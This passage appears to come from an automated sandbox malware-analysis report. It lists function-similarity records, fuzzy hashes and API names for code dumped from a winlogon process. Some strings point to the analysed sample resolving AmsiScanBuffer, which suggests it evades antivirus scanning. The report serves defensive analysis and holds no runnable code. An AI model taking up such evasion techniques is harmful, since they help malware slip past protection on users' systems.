                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocFree
                                  • String ID: $rbx-
                                  • API String ID: 756756679-3661604363
                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                  • Instruction ID: 14af5fe45afac1de195f65a21a4c0ceb947a22538004007919bffdfdfc640091
                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                  • Instruction Fuzzy Hash: A331AE22741BD687EA54DF17E94872963A0FB44BC4F0A402E8F4947B66EF38C4E18B30
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocFree
                                  • String ID: $rbx-
                                  • API String ID: 756756679-3661604363
                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                  • Instruction ID: 58a081435fa869842f5ec09853ec55152717eb6fe42c14926e182d2e3a43f2a7
                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                  • Instruction Fuzzy Hash: E3318221741B9286FA51DF1FE58876963A0FB54B88F0A402B8F4907B56EF34C4E58B20
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: ErrorLast$Value$FreeHeap
                                  • String ID:
                                  • API String ID: 365477584-0
                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                  • Instruction ID: 461b37b39a04fa0aea62c8c5241b6e6ce36334fdceb55650c3323b4de1a3d23c
                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                  • Instruction Fuzzy Hash: 051173213942C342FA586733E81D36E1259BB857E0F56462FA866567C7DF38C4C18F21
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: ErrorLast$Value$FreeHeap
                                  • String ID:
                                  • API String ID: 365477584-0
                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                  • Instruction ID: 6ee627d2b2e3662c7b0ec4e30c7bfb1ba790de5f1b6c59100786f73f84a0f73e
                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                  • Instruction Fuzzy Hash: 341173213C52D342FA146733E89D7AE1252BB847B0F5646AFA97A567C7DE38C4C14F20
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                  • String ID:
                                  • API String ID: 517849248-0
                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                  • Instruction ID: 1d8a4ed6992c39233f4a02bd144381189e5d46a7019aa5e5ce99f07443c05207
                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                  • Instruction Fuzzy Hash: F5012D25744B8286EB14DB23E85C35963A1F788FC5F49403A9E9E83755DF3CC985CBA0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                  • String ID:
                                  • API String ID: 517849248-0
                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                  • Instruction ID: aadd3f8e96d0b8550f2f4e0aee76a5c4c79e6b4e38a5d3b3a6f34917246a207f
                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                  • Instruction Fuzzy Hash: 08016D21740B9286EB10DB23E898359A3A1F788FC5F49413B9E4E43755DE3CC589CBA0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                  • String ID:
                                  • API String ID: 449555515-0
                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                  • Instruction ID: 3b81aa958ff413cfa8e5ec496202203acca77d3b2fa95da1e903ea01d678b2ed
                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                  • Instruction Fuzzy Hash: 02012965351B8282FB249B63E84C71973A4BB48BC5F15002ECA4E463A6EF3DC488DB61
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                  • String ID:
                                  • API String ID: 449555515-0
                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                  • Instruction ID: 73c2018ef39db80a5f6972731dfa494449b502553b15937f075091f61a90e3d3
                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                  • Instruction Fuzzy Hash: 8F012D6535179282FB249B2BE85D71573A1BB48B86F15002FC94D063A6EF3DC188CB20
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: FinalHandleNamePathlstrlen
                                  • String ID: \\?\
                                  • API String ID: 2719912262-4282027825
                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                  • Instruction ID: d4a347fda05ee2ec315dd7a066c065807b91727e5b562d1780f4fc0e84db1b32
                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                  • Instruction Fuzzy Hash: 47F062623446C692EB308F22F5CC3596361F744BC9FC5402ADA498695ADF7CC6C8CF20
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: FinalHandleNamePathlstrlen
                                  • String ID: \\?\
                                  • API String ID: 2719912262-4282027825
                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                  • Instruction ID: eb5ff2c951a5bae482f9afec4dfae658f0f6c27fa77660efb834e5cefa4e4125
                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                  • Instruction Fuzzy Hash: 1EF0C2623446C692FB208B22F4C83596761F744B89FC5412BCA4D4295ADF7CC6CCCF20
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: CombinePath
                                  • String ID: \\.\pipe\
                                  • API String ID: 3422762182-91387939
                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                  • Instruction ID: d6115707d6aef9e693d2db8f6a02cca2a5f11f351de9235fc31a88dc035036b6
                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                  • Instruction Fuzzy Hash: 91F0A764744BC282EA148B13FD5C1196260FB48FC4F458037EE1A87B2ADF3CC4C58B21
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                  • Instruction ID: ff0e80ec2ea6d149adea14970e351b468f08ed8edd75788b206b99ba77f6249f
                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                  • Instruction Fuzzy Hash: ADF0966134468281EA108B26E88C3695331FB497E0F95021EDA69865E6DF3CC4C8CB21
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: CombinePath
                                  • String ID: \\.\pipe\
                                  • API String ID: 3422762182-91387939
                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                  • Instruction ID: c3fba989d3157824e95eb0131d30ebd2c2b0100f61e071794293bd0bcb81d083
                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                  • Instruction Fuzzy Hash: 1AF08264344BD291FA049B17F9581196360BB48FC6F458037EE1E47B1ACE2CC4C98B20
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                  • Instruction ID: 949ca7e6ec979fc2a5cf465ec948dfa1051e8999589d5deae6457db39b19937b
                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                  • Instruction Fuzzy Hash: F3F0966134468281FA108B25D88D3591320FB497A1F95031FDA6D461E6DF2CC4CCCB20
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProcSleep
                                  • String ID: AmsiScanBuffer$amsi.dll
                                  • API String ID: 188063004-3248079830
                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                  • Instruction ID: ce6394d4e44f068df84350fd0878b21049811728e1f42b05845d703d061999ab
                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                  • Instruction Fuzzy Hash: 27D067506916D2D5FA086B27E89D3642262BB68B03FD6045FC50E052A2DE2C85DDCB70
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: CurrentThread
                                  • String ID:
                                  • API String ID: 2882836952-0
                                  • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                  • Instruction ID: 905d22ae79c84e42d4d8527ec3c40c0e9e586524a5fdd5434e08fc97ebc96079
                                  • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                  • Instruction Fuzzy Hash: 7B02E732259BC586E7A0CB56E49835AB7B0F3C4794F11415BEA8E87BA9DB7CC484CF10
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                  • Instruction ID: efc5a291f633b6cec668ad152656bef100cab3faa8e395eb72ffee173350b227
                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                  • Instruction Fuzzy Hash: 1451AE3524469287F364CF17E488A5AB7A0F788B81F52415F9E4A43B96DB38C9C5CF60
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                  • Instruction ID: e98ddb78df2c4db77b958ecbb1f9d3a2bb0208d9d2e59975f59b075a0fa9858d
                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                  • Instruction Fuzzy Hash: 0B518F36754682C7E724DF67E84862AB3A5F788B84F52411EDE4A43756EF38C886CF10
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                  • Instruction ID: 65822839812e52c29eb79abd1652f2b94bd4da43e61eb925813e3cd2f3eb676f
                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                  • Instruction Fuzzy Hash: 0451923525469287F724CF17E88862AB7A0F788B85F52415FDE4A43756EF38C985CF10
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: CurrentThread
                                  • String ID:
                                  • API String ID: 2882836952-0
                                  • Opcode ID: 3353fd0803e8b62cac05d50f1b0f1413ca787e0ff18400d19a3c90f3a66eef8b
                                  • Instruction ID: 0c98546ec25a6069360e9145e9579234ee5df5f422805e35053f171e0809072b
                                  • Opcode Fuzzy Hash: 3353fd0803e8b62cac05d50f1b0f1413ca787e0ff18400d19a3c90f3a66eef8b
                                  • Instruction Fuzzy Hash: 3861C636169B85C7EB60CB16E45872AB7E4F388744F51011AFA8D87BAADB7CC580CF10
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: CurrentThread
                                  • String ID:
                                  • API String ID: 2882836952-0
                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                  • Instruction ID: 5234b59811223bd2deff02aec751b4bcb925e1f09013028f97830a5a62a14f1b
                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                  • Instruction Fuzzy Hash: 4861D536568A8186F760CB16E58871AB7B0F388784F51055BFA8E47BAADB7CC580CF10
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
